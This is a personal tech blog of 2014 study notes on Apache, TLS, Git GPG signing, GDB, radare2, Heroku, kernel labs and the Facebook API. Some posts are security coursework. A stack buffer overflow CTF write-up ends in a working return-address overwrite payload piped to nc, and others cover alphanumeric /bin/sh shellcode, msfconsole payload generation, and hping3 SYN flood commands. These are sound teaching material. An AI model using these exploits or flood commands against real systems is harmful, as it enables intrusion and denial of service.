Friday, December 12, 2014

Debugging Apache Start/Reload

After adding a new virtual host config file for Apache, I tried to reload Apache but got the following:
>> service apache2 reload
Reloading web server config: apache2 failed!
However, there was no obvious log to read that would explain why "apache2 failed" (the Apache error log showed nothing either). So I used strace:
strace -Ff service apache2 reload &> /tmp/t
Then, by searching for the "log" keyword in /tmp/t, we get:
Process 62754 detached
[pid 62750] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 1}], 0, NULL) = 62754
[pid 62750] --- SIGCHLD (Child exited) @ 0 (0) ---
[pid 62750] rt_sigreturn(0x11)          = 62754
[pid 62750] write(1, "Action 'configtest' failed.\n", 28) = 28
[pid 62750] write(1, "The Apache error log may have mo"..., 48) = 48
[pid 62750] exit_group(1)               = ? 
There it is! The "configtest" action failed, and that is what caused "apache2 failed".
So here is a better way to debug my config file:
>> apachectl configtest
apache2: Syntax error on line 268 of /etc/apache2/apache2.conf: Syntax error on line 26 of /etc/apache2/sites-enabled/nphw3.conf: use of macro 'VHost' defined on line 2 of /etc/apache2/sites-enabled/nphw3.conf  with 2 arguments instead of 3
Action 'configtest' failed.
The Apache error log may have more information. 

Saturday, December 6, 2014

TLS/SSL Study Note


In the third assignment of "Network Security Practice", we were asked to trace TLS/SSL packets. I am writing down my understanding of TLS/SSL after studying Wikipedia and other sites.



  2. SERVER A: serving the desired application services for CLIENT A
  3. SERVER B: the server (certificate authority) that issues the digital certificate for SERVER A


  1. [CLIENT] → [SERVER A]
    • request secure connection
    • offer a list of supported cipher suites
  2. [SERVER A] → [CLIENT]: sends back the following:
    • picked cipher/hash function
    • its identification (digital certificate), which mostly contains:
      • servername
      • trusted certificate authority
      • public encryption key
  3. [CLIENT] → [SERVER B]: check the validity of SERVER A's certificate
  4. [CLIENT] ←→ [SERVER A]: generate the session key
    • [CLIENT] encrypts a random number using the received public key, then sends out the result
    • [SERVER A] decrypts it with its private key to recover the random number
  5. [CLIENT] ←→ [SERVER A]: start application-layer communication, encrypting/decrypting with the picked cipher and a session key derived from the random number
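
Step 4 can be illustrated with a toy sketch in Python. It uses textbook RSA with tiny primes, chosen here only for illustration; real TLS uses much larger keys, padding, and a key-derivation step, none of which is modelled.

```python
# Toy illustration of step 4 (RSA key transport) with textbook-sized numbers.
# The primes and exponent are illustrative assumptions, not real TLS parameters.
import secrets

# SERVER A's key pair.
p, q = 61, 53
n = p * q                  # public modulus
e = 17                     # public exponent
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)        # private exponent (modular inverse, Python 3.8+)

# CLIENT: pick a random number and encrypt it with the server's public key (n, e).
client_secret = secrets.randbelow(n - 2) + 2
ciphertext = pow(client_secret, e, n)

# SERVER A: decrypt with its private key d and recover the same number.
server_secret = pow(ciphertext, d, n)

print(client_secret == server_secret)
```

Only the holder of d can recover the number from the ciphertext, which is why both sides can then use it as shared key material.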


Sunday, November 30, 2014

Git Commit with GPG Key


Creating a commit in Git is easy: just run "git commit". The author (name and email) is set either by a parameter of the commit or by reading the settings in "~/.gitconfig".

Method 1: set the author in command parameter

$ git commit -am "bug fixed" --author="Author Name <>"

Method 2: reading the user setting

$ git config --global user.name "Heron Yang"
$ git config --global user.email <your email>
However, nothing guarantees that the commit author is really the person they claim to be. This is where GPG comes in.

GPG Design Explained

It uses a public/private key pair design, like ssh-keygen. Normally, the author generates a pair of keys: a public key and a private key. It's fine to share the public key, which allows other people to create encrypted content for the author; no one can decrypt that content without the private key. For signing, it works the other way around: the author signs with the private key, and anyone holding the public key can verify the signature.
So, sharing the public key while keeping the private key on your own machine allows you to be recognised and verified.

Git Command with GPG Key

Therefore, if we want to create a verifiable Git commit, we should make Git work with GPG. Here are the steps (install GPG before starting):

A. Generate key pair

$ gpg --gen-key # a few questions will pop up; enter your name/email/passphrase, and pick the defaults for the others

B. List generated keys

$ gpg --list-keys # list your keys
pub   2048R/xxxxxxxx 2014-11-30
uid       [ultimate] Heron Yang (genrate gpg) <>
sub   2048R/yyyyyyyy 2014-11-30
$ gpg --list-secret-keys # list private keys

C. Add your GPG Key to Git Config

Put your key ID (xxxxxxxx) into the Git configuration by doing:
$ git config --global user.signingkey xxxxxxxx

D. Commit and See if It Works

Commit like this:
$ git commit -S
Check log:
$ git log --show-signature
commit 252aa0dd0643d86df16b93b509a6a15b95xxxxxx
gpg: Signature made Sun Nov 30 13:52:57 2014 CST using RSA key ID xxxxxxxx
gpg: Good signature from "Heron Yang (genrate gpg) <>" [ultimate]
Author: Heron Yang <>
Date:   Sun Nov 30 13:52:51 2014 +0800
    test gpg


Monday, November 17, 2014

Alphanumeric Shellcode of EXEC("/bin/sh") without binsh/BINSH Characters


This is one of the CTF tasks from "Secure Programming" course in NCTU.


Input: a string with the following restrictions
  • Letters and digits only, which means: [0-9], [a-z], and [A-Z]
  • None of the characters in "binsh/BINSH"
This string, which we call shellcode, will be executed as machine code on the target server. So, we can guess that the program looks like this:

Workable Shellcode

First, let's ignore the restrictions. We need test code that executes "/bin/sh" successfully as a baseline for the later steps. Here it is:

Also, by referring to the system call documentation, we learn which registers should be set before calling "INT 0x80":

  • EAX: 0x0b (the execve system call number)
  • EBX: Address of the "/bin/sh" string
  • ECX, EDX: 0x00 (optional)

Try: msfencode

cat shellcode.txt | msfencode BufferRegister=ECX -i sc.bin -e x86/alpha_mixed -t python -b 'binshBINSH'
This command should give us our solution. However, the encoder returns an error saying that it can't find one.

Write It on My Own

Since the existing encoder can't solve this problem, we now have to solve it on our own. The things we know so far:

Issue 1: Storing Arbitrary Value on Stack

  • PUSH a small random value into the stack
  • POP to ECX
  • DEC ECX to the wanted value
For a larger wanted value:
  • PUSH a small random value into the stack
  • POP to EAX
  • XOR EAX, <value> (this may need to be done twice to gain the wanted value)
  • the value for XOR should be calculated manually
  • pick ECX for DEC/POP/PUSH instructions under our initial restrictions
  • pick EAX for XOR (0x35 opcode)
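
The manual XOR calculation can be sketched as a small search in Python. This is a hypothetical helper, not the script used for the solution: it looks for two immediates made only of permitted characters whose combined XOR turns the current EAX value into the wanted one. The names `xor_pair` and `xor_dwords` are made up for this sketch.

```python
import string

# Bytes the shellcode may contain: letters and digits, minus the banned ones.
BANNED = set("binshBINSH")
ALLOWED = [ord(c) for c in string.ascii_letters + string.digits if c not in BANNED]
ALLOWED_SET = set(ALLOWED)

def xor_pair(start: int, target: int):
    """Return (a, b) from ALLOWED with start ^ a ^ b == target, or None."""
    want = start ^ target
    for a in ALLOWED:
        if (want ^ a) in ALLOWED_SET:
            return a, want ^ a
    return None

def xor_dwords(start: int, target: int):
    """Build two 32-bit XOR immediates, byte by byte, or return None."""
    first = second = 0
    for shift in (0, 8, 16, 24):
        pair = xor_pair((start >> shift) & 0xFF, (target >> shift) & 0xFF)
        if pair is None:
            return None
        first |= pair[0] << shift
        second |= pair[1] << shift
    return first, second

imm1, imm2 = xor_dwords(0x00000000, 0x0000000B)  # turn EAX = 0 into 0x0b
print(hex(imm1), hex(imm2), hex(0 ^ imm1 ^ imm2))
```

A result of None means the difference cannot be produced with two permitted bytes (for example, any byte with the top bit set), so a different starting value is needed.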

Issue 2: Storing Instructions on Stack

Some instructions are not accepted in our input shellcode, so we generate those instructions as data and push them onto the stack. With the "-fno-stack-protector -z execstack" options when compiling with GCC, we can execute the pushed instructions later.

Issue 3: Move EIP to Stack

  • EIP points into our shellcode, which itself sits on the stack
  • ESP points to where our instructions ("POP EBX", "INT 0x80") are pushed
It would be easy if we could use a jump instruction to move EIP to ESP; our instructions would then be executed. However, we only have rel8 (8-bit immediate) jump instructions, which cannot reach far enough to jump to ESP.
Therefore, I popped the stack at the beginning of the shellcode in order to increase ESP.
  • POP many times: each POP increases ESP
  • make ESP land after (and close to) the end of our shellcode
  • use a short 8-bit jump to our stack (where "POP EBX", "INT 0x80" are located)


Here's my solution:

And, the details are in my Github repo.

Wednesday, October 29, 2014

Radare2 Memo


Radare2 is a handy tool for analysing binary code, offering a clean and fast way to browse a binary file as assembly code. Here, I am writing down the common commands I have used so far:
  • fs: view flag sections
  • fs symbols: switch to "symbols" flag sections
  • f: show flag list of current symbol section
  • s main: jump to main (flag)
  • af: analyze function
  • pdf: view current function in assembly code
  • V: visual mode
  • p (in visual mode): switch between different view methods
  • q (in visual mode): quit visual mode
  • e asm.syntax=(intel|att): change asm code syntax


Sunday, October 26, 2014

msfconsole Memo

In the Secure Programming assignment, we were asked to get the flag on the server using a shellcode solution. So, I've studied msfconsole and written some notes here:

Pick Target Platform / Action

First, pick your target platform and the action using the 'use' command. For example: use payload/linux/x86/exec


Use 'show encoders' to view the encoder list.

Generate Code

Generate your result with the 'generate' command. The options are as below:
  • -h: see the help text
  • -b <opt>: the list of characters to avoid, ex. '\x00\xff'
  • -e <opt>: the name of the encoder module to use
  • -f <opt>: the output file name (otherwise stdout)
  • -i <opt>: the number of encoding iterations
  • -o <opt>: a comma separated list of options in VAR=VAL format
  • -s <opt>: add NOOP characters
  • -t <opt>: the output format: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll ...


  • You can execute shell commands in msfconsole directly.


Saturday, October 25, 2014

Detecting SSL in PHP on Heroku

In order to have a secure connection, websites would like users to use HTTPS instead of HTTP. However, we can't always control which URL the user requests, which means the user may ask for the HTTP URL instead of the HTTPS one.

So, to solve this problem, we detect whether the user is requesting an HTTP URL. If so, we respond with a 301 to redirect him to our HTTPS site.

Normally, if we implement it in PHP, we add the following code at the top of the file:

However, Heroku doesn't set $_SERVER['HTTPS']; it provides $_SERVER['HTTP_X_FORWARDED_PROTO'] instead. So, we do:
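
The decision logic can be sketched in Python (a language-neutral illustration, not the PHP used on the site). The dictionary stands in for PHP's $_SERVER, and the function name and the `behind_proxy` switch are assumptions made for this sketch.

```python
def https_redirect_target(server: dict, behind_proxy: bool):
    """Return the HTTPS URL to send in a 301 redirect, or None if already secure."""
    if behind_proxy:
        # Heroku-style: the router reports the original scheme in this header.
        secure = server.get("HTTP_X_FORWARDED_PROTO", "").lower() == "https"
    else:
        # Plain setup: HTTPS is non-empty (and not "off") for secure requests.
        secure = server.get("HTTPS", "off").lower() not in ("", "off")
    if secure:
        return None
    return "https://" + server["HTTP_HOST"] + server.get("REQUEST_URI", "/")

request = {"HTTP_X_FORWARDED_PROTO": "http",
           "HTTP_HOST": "example.com",
           "REQUEST_URI": "/login"}
print(https_redirect_target(request, behind_proxy=True))
```

The only difference between the two environments is which variable carries the scheme; the redirect itself is built the same way.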

Thursday, October 23, 2014

GDB Memo


GDB was a scary tool for me years ago; however, I found it's actually pretty handy. And, instead of Googling the commands every time, I am writing down the common ones I use in this post:

Common Commands


  • kill: stop exec
  • run: start execution
  • quit
  • help


  • <ctl-c>: break exec
  • continue
  • list: see where the execution stopped
  • next: will go 'over' the function calls
  • step: will go 'into' the function calls
  • print variable: see variable
  • finish: return from a function

Call Stack

  • backtrace
  • info frame
  • info locals
  • info args


  • break line number
  • break function name
  • tbreak: same as break but only stops once (temporary breakpoint)
  • info breakpoints
  • disable breakpoint number
  • ignore breakpoint number times: ignore the breakpoint for the given number of times


  • watch variable
  • rwatch variable: read watchpoint
  • awatch variable: read/write watchpoint
  • info breakpoints
  • disable breakpoint number


char *s = "hello!\n"
  • x/s s: print string
  • x/c s: print s[0]
  • x/4c s: print s[0]~s[3]
  • x/t s: print first 32 bit
  • x/x s: print 8 bytes in hex
  • info registers
  • core core: see core dump crash
  • nexti: 'next' for instruction level
  • stepi: 'step' for instruction level
  • disassemble function name

Other Helpful Commands

  • info proc
  • frame: show where am I

Print Variables (Organised)

  • info variables: list "All global and static variable names"
  • info locals: list "Local variables of current stack frame" (names and values), including static variables in that function
  • info args: list "Arguments of the current stack frame" (names and values)

More: Fork

  • set follow-fork-mode mode: follow which process after fork
    • mode -> parent, child
    • show follow-fork-mode
  • set detach-on-fork mode (reference)
    • mode -> on, off
    • on(default): the child process (or parent process, depending on the value of follow-fork-mode) will be detached and allowed to run independently.
    • off: both processes will be held under the control of GDB. One process (child or parent, depending on the value of follow-fork-mode) is debugged as usual, while the other is held suspended.
    • show detach-on-fork
  • set follow-exec-mode mode
    • mode -> new, same


Thursday, October 16, 2014

Install UNIX Version 1 (1972) on Linux

I am now reading the classic book "The Unix Programming Environment", which was published in 1984. It was suggested by my seniors, and the authors are from Bell Labs, so it should be a nice book for learning the original design of UNIX.

However, while I was testing the commands in the book, I found that my environment is pretty different from the authors'. So, I am building their environment, UNIX version 1 (1972, I guess), for fun.

Step 1. Setup Simulator

We simulate the old environment using the SIMH simulator.

Step 2. Download UNIX

Download the UNIX code from qrush's github.

Step 3. Setup Image Files

qrush's image files were not working on my machine, so I found other image files to replace them.


I wrote a Makefile to do all the tasks, and here it is:

* note: I found that the bash process requires an extremely large amount of resources, possibly because something is implemented with busy-waiting.

Wednesday, October 15, 2014

Nagios - Server Monitoring

In order to get notifications when any of my services is down, I've installed Nagios on my server. Here are the sites I referred to during installation:


Further Configuration for Notification:


Things to note while following the two sites:
  • restart Apache after adding the new config file for Nagios
  • update your email address in contacts.cfg (in order to receive the mail)

Wednesday, October 1, 2014

Stack Buffer Overflow

In the course, Secure Programming, we are asked to solve wargame problems. Here comes the first practice: Stack Buffer Overflow.


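void do_magic(char *buf,int n){
        int i;
        for (i = 0; i < n; i++)   /* loop header reconstructed; it is missing from the listing */
                buf[i] ^= rand()%256;
}

void magic(){
        char magic_str[60];
        /* ... the rest of the function is missing from the listing ... */
}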

Goal: Get the flag!


The structure looks like this: local variables -> frame pointer -> return address. Our goal is to overwrite the return address and make the program run a function it was not supposed to run.

[Solution 1] Disassemble the bin file.

You can apply any of the following tools:
  1. objdump: objdump -d magic
  2. Online decompiler:
  3. IDA Pro
And, I can get:
08048681 <magic>:
 8048681:       55                      push   %ebp
 8048682:       89 e5                   mov    %esp,%ebp
 8048684:       83 ec 58                sub    $0x58,%esp
 8048687:       8d 45 bc                lea    -0x44(%ebp),%eax
 804868a:       89 44 24 04             mov    %eax,0x4(%esp)
 804868e:       c7 04 24 36 88 04 08    movl   $0x8048836,(%esp)
 8048695:       e8 66 fe ff ff          call   8048500 <__isoc99_scanf@plt>

We can learn that the character array starts 0x44 = 68 bytes below EBP. We should add 4 more bytes for the saved frame pointer, so the return address is 72 bytes past the start of the buffer.
*note: "ESP is the current stack pointer. EBP is the base pointer for the current stack frame."

[Solution 2] GDB debug analysis

>> gdb magic
(gdb) b magic
(gdb) run
(gdb) disas
Dump of assembler code for function magic:
   0x08048681 <+0>:     push   %ebp
   0x08048682 <+1>:     mov    %esp,%ebp
   0x08048684 <+3>:     sub    $0x58,%esp
   0x08048687 <+6>:     lea    -0x44(%ebp),%eax
   0x0804868a <+9>:     mov    %eax,0x4(%esp)
   0x0804868e <+13>:    movl   $0x8048836,(%esp)
   0x08048695 <+20>:    call   0x8048500 <__isoc99_scanf@plt>
=> 0x0804869a <+25>:    lea    -0x44(%ebp),%eax
   0x0804869d <+28>:    mov    %eax,(%esp)
   0x080486a0 <+31>:    call   0x80484d0 <strlen@plt>
   0x080486a5 <+36>:    mov    %eax,0x4(%esp)
   0x080486a9 <+40>:    lea    -0x44(%ebp),%eax
   0x080486ac <+43>:    mov    %eax,(%esp)
   0x080486af <+46>:    call   0x8048621 <do_magic>
   0x080486b4 <+51>:    lea    -0x44(%ebp),%eax
   0x080486b7 <+54>:    mov    %eax,0x4(%esp)
   0x080486bb <+58>:    movl   $0x8048836,(%esp)
   0x080486c2 <+65>:    call   0x8048460 <printf@plt>
   0x080486c7 <+70>:    leave
   0x080486c8 <+71>:    ret
(gdb) info registers
eax            0x1      1
ecx            0x1      1
edx            0xf7fb88c4       -134510396
ebx            0xf7fb6ff4       -134516748
esp            0xffffd560       0xffffd560
ebp            0xffffd5b8       0xffffd5b8
esi            0x0      0
edi            0x0      0
eip            0x804869a        0x804869a <magic+25>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Try inputs of different sizes until ebp is modified; that tells us the size needed for the stack buffer overflow.


(python -c 'print "heron\n" + "\x00"*72 + "\x0e\x86\x04\x08"' && cat) | nc 6666
  • ( python ... && cat ) keeps stdin open so that no EOF is passed to nc, which might otherwise close the connection before we can interact with it.
  • \x0e\x86\x04\x08 is the address of the function we want the program to run, written in little-endian byte order.
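
The overflow part of the payload can also be assembled explicitly. The following is a minimal Python sketch that derives the padding from the disassembly and packs the address with struct; the constant names are chosen here for illustration, and the leading "heron\n" line from the one-liner is left out.

```python
import struct

BUF_OFFSET = 0x44      # buffer starts at ebp-0x44 (from `lea -0x44(%ebp),%eax`)
SAVED_EBP = 4          # saved frame pointer sits between the buffer and the return address
TARGET = 0x0804860E    # the address written as "\x0e\x86\x04\x08" in the one-liner

padding = b"\x00" * (BUF_OFFSET + SAVED_EBP)    # 68 + 4 = 72 bytes
payload = padding + struct.pack("<I", TARGET)   # "<I": 32-bit little-endian

print(len(padding), payload[-4:].hex())  # prints: 72 0e860408
```

Using struct.pack avoids reversing the address bytes by hand, which is an easy place to make a mistake.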


Tuesday, August 12, 2014

Paper, Slingshot, Snapchat

Get to know these three apps. Slingshot and Snapchat are bringing the IM user experience into the next generation, which is much lighter and faster. Paper is redesigning the way we think of Facebook.

Paper (Facebook)

Its UI has never been seen elsewhere, and the user has different sections to follow. The folding and unfolding interface is very fun and user-friendly.

Slingshot (Facebook)

It's released on 7/31, 2014, which is pretty new at this point. Facebook is trying to create a new photo-based IM experience. This may be inspired by Snapchat.

Snapchat (Rejected Facebook's $3 Billion Offer)

Snapchat is pretty famous for rejecting Facebook's $3 Billion offer, and it's popular among teenagers. It's fun: you get a pretty light chatting experience, and don't have to worry too much about telling secrets. Ha.

If You Can't Find Them on App Store...

Some of them may be available only in the U.S. market; however, it is pretty easy to switch your account to a different region (switch your account to the U.S. if you're not in the U.S.):

  1. Click on "Apple ID" at the bottom of "Featured" tab in App Store
  2. Click on "View Apple ID", it may request for your password
  3. Click on "Country/Region", pick "United States", and finish the setup by pressing the "Next" button several times


Sunday, June 29, 2014

PaaS: Google AppEngine v.s. Heroku



I am putting the "Reference" section first in this post because I am writing this post entirely based on the references.


Language Support

Google AppEngine: Python, Java, PHP, Go / Cloud SQL(MySQL compatible)
Heroku: Ruby, Java, Node.js, Python, PHP, Clojure, Scala / PostgreSQL, MongoDB, Cloudant, Redis

Comments for Google AppEngine

AppEngine’s proprietary, read-only nature results in tedious and unnecessary code refactoring; apps have to be written specifically with AppEngine in mind, API’s have to be written specifically for AppEngine, even standard Java code has to be extensively altered to fit into the AppEngine environment.

Google insists on AppEngine customers only using its BigTable non-relational database, although they have also recently added some support for CloudSQL.

Comments for Heroku

Heroku’s database-platform choices reflect a collection that is in widespread use already in the wider world.

Comments on Both

Heroku’s database-platform choices reflect a collection that is in widespread use already in the wider world.

My Summary

I have only a little development experience on both PaaS platforms. However, from the references I found, more people recommend Heroku than Google AppEngine, because Google AppEngine locks you in, lacks flexibility, and is hard to move away from to a regular VPS if needed.

IaaS, PaaS, SaaS


To start a new web-based project (mainly HTTP/HTTPS-related things), we have multiple choices for the platform. We can host a whole virtual machine, on AWS or Linode. Or, we can put our code on Google App Engine or Heroku. They all have different pros and cons, and we should pick the one which matches the purpose of the project.

SaaS: Software as a Service


  • Gmail
  • Google+

PaaS: Platform as a Service

One can develop applications and run them on top of the platform, which takes care of the execution.

Vendors manage:

  • runtime
  • middleware
  • O/S
  • virtualization
  • server
  • storage
  • networking

Users manage:

  • application
  • data


  • Heroku
  • Google App Engine

IaaS: Infrastructure as a Service

Users buy a fully outsourced service (the whole virtual machine)


  • AWS(Amazon Web Services)
  • Linode


Friday, June 13, 2014

SYN Flood DDOS Defense in Kernel Code


Kernel 2.6.32


SYN Flood DDOS is still a big headache for system administrators, and we don't really have a solution for this kind of attack so far in the real world.
To start a connection between a server and a client, they have to perform "TCP 3-Way Handshake" first without any failure:
  1. client -> server: SYN
  2. server -> client: SYN-ACK
  3. client -> server: ACK
* SYN/ACK are flag bits in TCP packets.
However, not everyone on the internet is friendly and follows every rule we have. An attacker may send only SYN packets (the first step of the 3-Way Handshake) but in very large numbers; the server may then run out of resources because there are too many half-open connections. The attacker can even use random source IPs in the packets so that the server is not able to distinguish the bad clients from the good ones.


In the kernel code, there's a hash table with request socket queues as entries. Whenever a new socket request (SYN packet) comes in, it's inserted into this hash table.
However, the capacity is of course limited, so the kernel has to drop some request sockets to allow new ones when the table is full. In the original kernel code, it kills old sockets every 0.2 seconds in net/ipv4/inet_connection_sock.c:inet_csk_reqsk_queue_prune.
In this last OSDI lab, unlike the original code, we do not rely on the regular routine to drop old request sockets; instead, we randomly drop a socket from the table when a new socket request comes in and the table is full.


Modify the Original Pruning Routine

In net/ipv4/inet_connection_sock.c:inet_csk_reqsk_queue_prune, add the following at line 513:
        thresh = max_retries;

Randomly Dropping Socket when Is Full

After tracing the code, we know that the function reqsk_queue_is_full is called whenever the TCP code wants to add a new sock to the request queue. So we simply add some code to this function.
static inline int reqsk_queue_is_full(struct request_sock_queue *queue)
{
    struct listen_sock *lopt = queue->listen_opt;
    struct request_sock **reqp, *req;
    int i, range, random;
    unsigned long now = jiffies;

    int r = (queue->listen_opt->qlen >> queue->listen_opt->max_qlen_log);

    printk("[OSDI] qlen = %d\n", lopt->qlen);
    if( r ) {

        range = lopt->nr_table_entries;
        printk("range = %d\n", range);

        // fill 'random' first, then reduce it to the table range
        get_random_bytes(&random, sizeof(random));
        random %= range;

        i = lopt->clock_hand;
        do {
            i = (i + 1) & (lopt->nr_table_entries - 1);
        } while (--random > 0);

        printk("i=%d first is killed\n", i);

        // head of the chosen queue (assumed: this assignment is missing from the listing)
        reqp = &lopt->syn_table[i];
        if ((req = *reqp) != NULL) {
            if (time_after_eq(now, req->expires)) {
                /* OSDI lab12 */
                reqsk_queue_unlink(queue, req, reqp);
                reqsk_queue_removed(queue, req);
            }
        }
        lopt->clock_hand = i;
    }

    // get the result again
    return queue->listen_opt->qlen >> queue->listen_opt->max_qlen_log;
}
We first compute the original is_full result. If the table is full, we randomly pick one queue entry from the table and drop the first element of that queue.
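
The policy itself is easy to try outside the kernel. The following Python sketch is a simplified model, not the kernel code: the class name, the bucket count, and the capacity are made up, and it always drops from a non-empty bucket instead of checking expiry times.

```python
import random

class RequestTable:
    """Toy model of the SYN queue: a fixed number of buckets, each a FIFO list."""

    def __init__(self, buckets: int, capacity: int, rng: random.Random):
        self.buckets = [[] for _ in range(buckets)]
        self.capacity = capacity
        self.rng = rng

    def __len__(self):
        return sum(len(b) for b in self.buckets)

    def add(self, request_id: int) -> None:
        if len(self) >= self.capacity:
            self._drop_random()
        self.buckets[hash(request_id) % len(self.buckets)].append(request_id)

    def _drop_random(self) -> None:
        # Pick a random non-empty bucket and drop its oldest (first) entry.
        candidates = [b for b in self.buckets if b]
        if candidates:
            self.rng.choice(candidates).pop(0)

table = RequestTable(buckets=8, capacity=16, rng=random.Random(0))
for syn in range(1000):          # a flood of 1000 half-open requests
    table.add(syn)
print(len(table))                # prints: 16
```

However large the flood, the table never grows past its capacity, and a new request always gets a slot at the cost of one randomly chosen old one.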


Method 1 - Use iptables (Firewall)

Use two simple user-space socket programs on two machines: one is the client, the other is the server. Make sure they can connect at the beginning (the routing between the two machines/VMs is okay). Then, on the client, drop all packets coming from the server by setting up the firewall, so that the client only ever sends SYN packets to the server.
sudo iptables -A INPUT -s <SERVER_IP> -j REJECT

Method 2 - Use hping3

sudo hping3 -i u1 -S -c 10 <SERVER_IP>

Another DDOS Experiment in our Workshop

The attacked server (right-hand side) has high CPU usage while the other server (left-hand side) is sending SYN flood packets.

Wednesday, May 21, 2014

[OSDI] ramfs XOR Encryption/Decryption while Read/Write in Kernel Code

This time, in our OSDI lab, we were asked to implement XOR encryption/decryption when someone reads from or writes to ramfs.

Setup the Flag (switch on/off the encryption/decryption feature)

Register a proc_dir_entry in fs/ramfs/inode.c to listen for external control of the flag. A proc_read and a proc_write function are required. So...

Global Variables & Macros

#define MAX_PROC_SIZE 100
int ramfs_flag;
static struct proc_dir_entry *proc_entry;

(register) Modify init_ramfs_fs

static int __init init_ramfs_fs(void)
{
    // OSDI lab 10
    proc_entry = create_proc_entry("flag", 0644, NULL);
    if (!proc_entry)    return -ENOMEM;   // creating the proc entry can fail
    proc_entry->read_proc = my_read;
    proc_entry->write_proc = my_write;
    ramfs_flag = 0;
    return register_filesystem(&ramfs_fs_type);
}

(remove) Modify exit_ramfs_fs

static void __exit exit_ramfs_fs(void)
{
    // OSDI lab 10
    remove_proc_entry("flag", NULL);
    unregister_filesystem(&ramfs_fs_type);   // original body of this function
}

(read) Add proc_read Handler

static int my_read(char *buf, char **start, off_t offset, int count, int *eof, void *data) {
    int len=0;
    len = sprintf(buf,"%d\n", ramfs_flag);

    return len;
}

(write) Add proc_write Handler

static int my_write(struct file *file, const char *buf, unsigned long count, void *data) {

    char t_data[MAX_PROC_SIZE];
    // keep room for the terminating '\0' so a long write cannot overflow t_data
    if(count >= MAX_PROC_SIZE)                  count = MAX_PROC_SIZE - 1;
    if(copy_from_user(t_data, buf, count))      return -EFAULT;
    t_data[count] = '\0';

    if(t_data[0] != '0' && t_data[0] != '1'){
        printk("garbage ignored\n");
        return count;   // just ignore
    }
    printk("my_write get : %s\n", t_data);

    // success setup
    if(t_data[0] == '0')                        ramfs_flag = 0;
    else if(t_data[0] == '1')                   ramfs_flag = 1;
    printk("ramfs_flag = %d ramfs_addr = %p\n", ramfs_flag, &ramfs_flag);
    return count;
}


Implement the Encryption/Decryption when the Flag is Up

Make our Flag Accessible by the MMU (fs/ramfs/internal.h)

extern const struct address_space_operations ramfs_aops;
extern const struct inode_operations ramfs_file_inode_operations;
extern int ramfs_flag;

Switch to Our Custom Handlers for MMU Read/Write (fs/ramfs/file-mmu.c)

const struct file_operations ramfs_file_operations = {
 .read  = do_sync_read,
 .aio_read = my_aio_read,   // OSDI lab 10
 .write  = do_sync_write,
 .aio_write = my_aio_write,   // OSDI lab 10
 .mmap  = generic_file_mmap,
 .fsync  = simple_sync_file,
 .splice_read = generic_file_splice_read,
 .splice_write = generic_file_splice_write,
 .llseek  = generic_file_llseek,
};

Encryption (fs/ramfs/file-mmu.c)

ssize_t my_aio_write(struct kiocb *iocb, const struct iovec *iov, unsigned long nr_segs, loff_t pos) {

    printk("OSDI: custom write\n");
    if(ramfs_flag && iov!=NULL) {
        size_t i;
        // note: this modifies the caller's buffer in place, and only the first segment
        char *ib = (char *)iov->iov_base;
        for( i=0 ; i < iov->iov_len ; i++ )   ib[i] ^= ENCODE_KEY;
        printk("ramfs_flag is up\n");
    }

    return generic_file_aio_write(iocb, iov, nr_segs, pos);
}

Decryption (fs/ramfs/file-mmu.c)

ssize_t my_aio_read(struct kiocb *iocb, const struct iovec *iov, unsigned long nr_segs, loff_t pos) {
    ssize_t r;
    printk("OSDI: custom read\n");
    r = generic_file_aio_read(iocb, iov, nr_segs, pos);
    if(ramfs_flag && iov!=NULL && r > 0) {
        // decode only the bytes that were actually read into the first segment
        size_t i, n = min_t(size_t, r, iov->iov_len);
        char *ib = (char *)iov->iov_base;
        for( i=0 ; i < n ; i++ )   ib[i] ^= ENCODE_KEY;
        printk("ramfs_flag is up\n");
    }
    return r;
}

p.s. ENCODE_KEY can be any char-sized constant (e.g. 0x25)
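
The reason one routine serves for both directions is that XOR with a fixed key is its own inverse. A quick user-space check in Python, using the example key 0x25 (the helper name is made up for this sketch):

```python
ENCODE_KEY = 0x25  # same example key as in the note above

def xor_bytes(data: bytes, key: int = ENCODE_KEY) -> bytes:
    """XOR every byte with the key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)

stored = xor_bytes(b"hello\n")   # what ends up in ramfs when the flag is up
print(stored)                    # prints: b'M@IIJ/'
print(xor_bytes(stored))         # prints: b'hello\n'
```

This also shows what to expect in the test: a file written with the flag up reads back as scrambled bytes once the flag is switched off.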

Run & Test

It should be something like this:
>> mount -t ramfs ramfs /mnt/ramfs/
>> cd /mnt/ramfs/
>> cat /proc/flag
>> echo 1 > /proc/flag
>> cat /proc/flag
>> echo hello > test
>> cat test
>> echo 0 > /proc/flag
>> cat test


Apache a2ensite with "Error! Site Does Not Exists"


I am now using "Apache/2.4.9 (Ubuntu)". After editing the Apache configuration file for my virtual hosted site, I found an error while trying to enable my site:
>> sudo a2ensite

however, it returns:
"Error: does not exists"


So, I started to trace the problem. a2ensite is simply a Perl script, so we can open it with a text editor, and I saw:

This means that only filenames ending with ".conf" are allowed. Therefore, I have to rename my settings file for the site:
mv /etc/apache2/sites-available/ /etc/apache2/sites-available/
This time, it works!


I don't understand why the developer of this code chose this design. Lots of people are used to naming the configuration file after their site's domain name, without ".conf". And, if ".conf" is required, the script should say so in its error message instead of only showing "does not exists".


Tuesday, May 20, 2014

Post on Facebook Page using Facebook Graph API

Facebook actually offers a great API that is flexible and simple. However, I feel it is hard to get started without the patience to read their documentation.

* I'm using as my host server for example here.


  • Read Facebook Official Document - Access Token
  • Create a Facebook App on Developer Facebook
    • find out App ID and App Secret, you will need them later
    • put in Settings->Website->Site URL and Mobile Site URL
    • since we will need the "manage_pages" permission, select it from the list and submit it for approval by Facebook (it takes around a week)
  • Create a simple file that prints GET parameters on your server code. Ex, put <?php print_r($_GET);?> as index.php in


  • App ID
  • App Secret
  • URL (
  • code
  • access_token
  • Facebook Page ID
  • message (the content you want to post on the page)

Facebook Graph APIs

  •<App ID>&redirect_uri=,publish_stream
    • you will get "code" from GET parameters in
  •<App ID>&redirect_uri=<App Secret>&code=<code>
    • you will get "access_token" and its expire time
    • this checks the user's account information (his/her Facebook pages)
  •<Facebook Page ID>/feed?access_token=<access_token>&message=<message>
    • the message is posted on the page



Wednesday, May 7, 2014

[OSDI] Adding Snapshot Feature for Block Devices in Kernel Code

